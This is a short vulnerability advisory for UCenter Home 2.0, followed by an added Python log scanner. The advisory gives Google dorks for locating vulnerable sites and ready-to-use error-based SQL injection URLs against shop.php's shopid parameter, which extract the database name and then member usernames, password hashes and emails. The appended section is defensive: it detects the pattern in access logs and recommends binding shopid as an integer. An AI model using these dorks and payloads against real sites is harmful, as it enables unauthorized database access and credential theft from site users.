__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Needed materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okey.
Edit the DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
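
Detection side of the request pattern above, as an added example that is not part of the original advisory: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer and labels the MySQL error-based pattern. The log lines, function names and marker list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 912
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12' HTTP/1.1" 200 640
192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?ac=view&shopid=abc HTTP/1.1" 200 300
"""

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Fragments of the duplicate-key error technique shown in the advisory (assumed marker list).
ERROR_BASED_MARKERS = ("floor(rand(", "information_schema", "group by", "concat(")


def classify(line):
    """Return (client, verdict, markers) for a suspicious shop.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # values come back URL-decoded
    if params.get("ac") != ["view"]:
        return None
    shopid = params.get("shopid", [""])[0]
    if re.fullmatch(r"[0-9]+", shopid):
        return None  # legitimate: shopid is a plain integer
    lowered = re.sub(r"\s+", " ", shopid.lower())
    hits = [k for k in ERROR_BASED_MARKERS if k in lowered]
    verdict = "error-based-sqli" if len(hits) >= 2 else "non-numeric-shopid"
    return (client, verdict, hits)


def scan(log_text):
    """Classify every line and keep only the flagged requests."""
    return [r for r in map(classify, log_text.splitlines()) if r]


if __name__ == "__main__":
    for client, verdict, hits in scan(SAMPLE_LOG):
        print(client, verdict, hits)
```

Detection complements the fix rather than replacing it: shopid should be handled as an integer or bound as a query parameter.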